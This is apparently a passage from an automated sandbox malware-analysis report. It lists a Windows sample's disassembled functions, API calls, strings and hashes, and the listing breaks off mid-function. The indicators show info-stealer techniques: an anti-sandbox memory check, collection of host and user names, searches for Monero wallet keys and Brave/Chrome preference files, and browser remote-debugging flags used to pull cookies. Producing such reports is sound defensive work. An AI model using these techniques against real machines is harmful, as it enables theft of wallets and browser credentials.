                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 83f98132bfaf55fafc8749c59255c4f48a0a688e3853542def28eb36b2fcb818
                                    • Instruction ID: c524136019a029d161887495f45c298083ea0da395165bf4944aca866cf331c0
                                    • Opcode Fuzzy Hash: 83f98132bfaf55fafc8749c59255c4f48a0a688e3853542def28eb36b2fcb818
                                    • Instruction Fuzzy Hash: 6F0186B1A08349ABCB00DF99DD49BAFBBB8F704711F100219F605E2280D7745A00DBA1
                                    Function 00C81110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C8112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C81132
                                    • ExitProcess.KERNEL32 ref: 00C81143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 9b45ceba09703a4db38d3d2400d396cf6c9d6b957c13dec347621677eb38040c
                                    • Instruction ID: 885a0ec84be67c36dfe7fc8b35f7d9a33c1d11eb2ac9266ba7bd8cf3875fd0c2
                                    • Opcode Fuzzy Hash: 9b45ceba09703a4db38d3d2400d396cf6c9d6b957c13dec347621677eb38040c
                                    • Instruction Fuzzy Hash: FAE0E67094930CFBE7107B91AD0EB5D76AC9B04B16F100155FB09765D0C7B52640AA9D
                                    Function 00C810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C810B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C810F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: eb75e8afe980fb891a798076a42edb192aa98a8cfa185d64a7dc418007cb5ce7
                                    • Instruction ID: e26e04dbae7b1901c81ff910f6e0e920653b64fa94eff94bd3029739c3c4286b
                                    • Opcode Fuzzy Hash: eb75e8afe980fb891a798076a42edb192aa98a8cfa185d64a7dc418007cb5ce7
                                    • Instruction Fuzzy Hash: 9FF0A7B1641318BBEB14AAB4AC59FAFB7DCE705B05F300448FA04E7281D6719F04DBA4
                                    Function 00C81190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C97A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97AA0
                                      • Part of subcall function 00C97A70: RtlAllocateHeap.NTDLL(00000000), ref: 00C97AA7
                                      • Part of subcall function 00C97A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00C97ABF
                                      • Part of subcall function 00C979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C811B7), ref: 00C97A10
                                      • Part of subcall function 00C979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C97A17
                                      • Part of subcall function 00C979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C97A2F
                                    • ExitProcess.KERNEL32 ref: 00C811C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: e837cc47181dae47c1d070dc8f866ff36bf9e7604444f12d4c44953e70e52372
                                    • Instruction ID: 455610a0d4df5aade0cf2ca6b910dd3bd6db82fa22571c488ce7cd60206c4e56
                                    • Opcode Fuzzy Hash: e837cc47181dae47c1d070dc8f866ff36bf9e7604444f12d4c44953e70e52372
                                    • Instruction Fuzzy Hash: 9AE0E2A591830953CE1073B8BC0EB2A32CC5B1560FF090814FA18D3142EE25E906A2A9

                                    Non-executed Functions

                                    Function 00C8BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00CA0B32,00CA0B2F,00000000,?,?,?,00CA1450,00CA0B2E), ref: 00C8BEC5
                                    • StrCmpCA.SHLWAPI(?,00CA1454), ref: 00C8BF33
                                    • StrCmpCA.SHLWAPI(?,00CA1458), ref: 00C8BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 00C8C8BB
                                    Strings
                                    • Google Chrome, xrefs: 00C8C6F8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00C8C534
                                    • \Brave\Preferences, xrefs: 00C8C1C1
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00C8C3B2
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00C8C495
                                    • Preferences, xrefs: 00C8C104
                                    • Brave, xrefs: 00C8C0E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 47b591bcffcc1b1d187e617cafc2dd08990a4512c9de5c8d7b14be9f4721e3a9
                                    • Instruction ID: a8fe79d155db439121bbaec6099b18a30880d4361501b576c0d1337a2f09c891
                                    • Opcode Fuzzy Hash: 47b591bcffcc1b1d187e617cafc2dd08990a4512c9de5c8d7b14be9f4721e3a9
                                    • Instruction Fuzzy Hash: AE5213725102089BCF14FB70DD9AEEE737DAF54305F404598B50AA6091EE34AB48EFE6
                                    Function 00C93B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C93B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C93B33
                                    • lstrcat.KERNEL32(?,?), ref: 00C93B85
                                    • StrCmpCA.SHLWAPI(?,00CA0F58), ref: 00C93B97
                                    • StrCmpCA.SHLWAPI(?,00CA0F5C), ref: 00C93BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C93EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00C93ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 2be6e6f3c667312d1815f7d61b4f0931f597f69ea6f52574cb35d8fd2774d212
                                    • Instruction ID: f5cebf70c3bcf8438d86de967baf63442213ff34c48e50f85c858d0432ecd15d
                                    • Opcode Fuzzy Hash: 2be6e6f3c667312d1815f7d61b4f0931f597f69ea6f52574cb35d8fd2774d212
                                    • Instruction Fuzzy Hash: 14A14072A0034C9BDF24EFA4DC89FEA7378BB49705F044598B61D96181EB709B88DF61
                                    Function 00C94B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C94B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C94B93
                                    • StrCmpCA.SHLWAPI(?,00CA0FC4), ref: 00C94BC1
                                    • StrCmpCA.SHLWAPI(?,00CA0FC8), ref: 00C94BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C94DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00C94DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 8f02edc58b620fd479cd5862c19d42133a6e162f957d796b04dce122bd23327c
                                    • Instruction ID: 616fc84013461cb21b058a89d70351ed8654ab3cf1c0c4650dd3d3da2e7c0fca
                                    • Opcode Fuzzy Hash: 8f02edc58b620fd479cd5862c19d42133a6e162f957d796b04dce122bd23327c
                                    • Instruction Fuzzy Hash: 5D614572904319ABCF24FBA0EC49EEA737CBB49705F044598B60996190EB70AB85DF91
                                    Function 00C947C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C947D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C947D7
                                    • wsprintfA.USER32 ref: 00C947F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C9480D
                                    • StrCmpCA.SHLWAPI(?,00CA0FAC), ref: 00C9483B
                                    • StrCmpCA.SHLWAPI(?,00CA0FB0), ref: 00C94851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C948DB
                                    • FindClose.KERNEL32(000000FF), ref: 00C948F0
                                    • lstrcat.KERNEL32(?,0152E3A0), ref: 00C94915
                                    • lstrcat.KERNEL32(?,0152D118), ref: 00C94928
                                    • lstrlen.KERNEL32(?), ref: 00C94935
                                    • lstrlen.KERNEL32(?), ref: 00C94946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 636bafee1a568bf2b8bd107ff76b184a5b5d2b1f91d87447eeffe47158a29b1b
                                    • Instruction ID: 1bc8ff7c67f79b63a1e7c470ab13e52128d5447381d875f6518964eb3edb923c
                                    • Opcode Fuzzy Hash: 636bafee1a568bf2b8bd107ff76b184a5b5d2b1f91d87447eeffe47158a29b1b
                                    • Instruction Fuzzy Hash: 5C5132B150431CABCB24FBB0EC89FE9737CAB58305F404598B65996190EB709B89DF91
                                    Function 00C940F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C94113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C9412A
                                    • StrCmpCA.SHLWAPI(?,00CA0F94), ref: 00C94158
                                    • StrCmpCA.SHLWAPI(?,00CA0F98), ref: 00C9416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C942BC
                                    • FindClose.KERNEL32(000000FF), ref: 00C942D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: ea4b4f19ff79b8211240845f8f102ff7ef15da6f01cead9aef6c7523f185f111
                                    • Instruction ID: 6e9e28dd58b11ad228912aa5e9fdc71681a702d49613af53290c9e9e4183e7f9
                                    • Opcode Fuzzy Hash: ea4b4f19ff79b8211240845f8f102ff7ef15da6f01cead9aef6c7523f185f111
                                    • Instruction Fuzzy Hash: 1A5166B1904318ABCF24FBB0DC89EEE737CBB58305F0445D8B61996050EB70AB899F94
                                    Function 00C8EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C8EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C8EE55
                                    • StrCmpCA.SHLWAPI(?,00CA1630), ref: 00C8EEAB
                                    • StrCmpCA.SHLWAPI(?,00CA1634), ref: 00C8EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 00C8F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
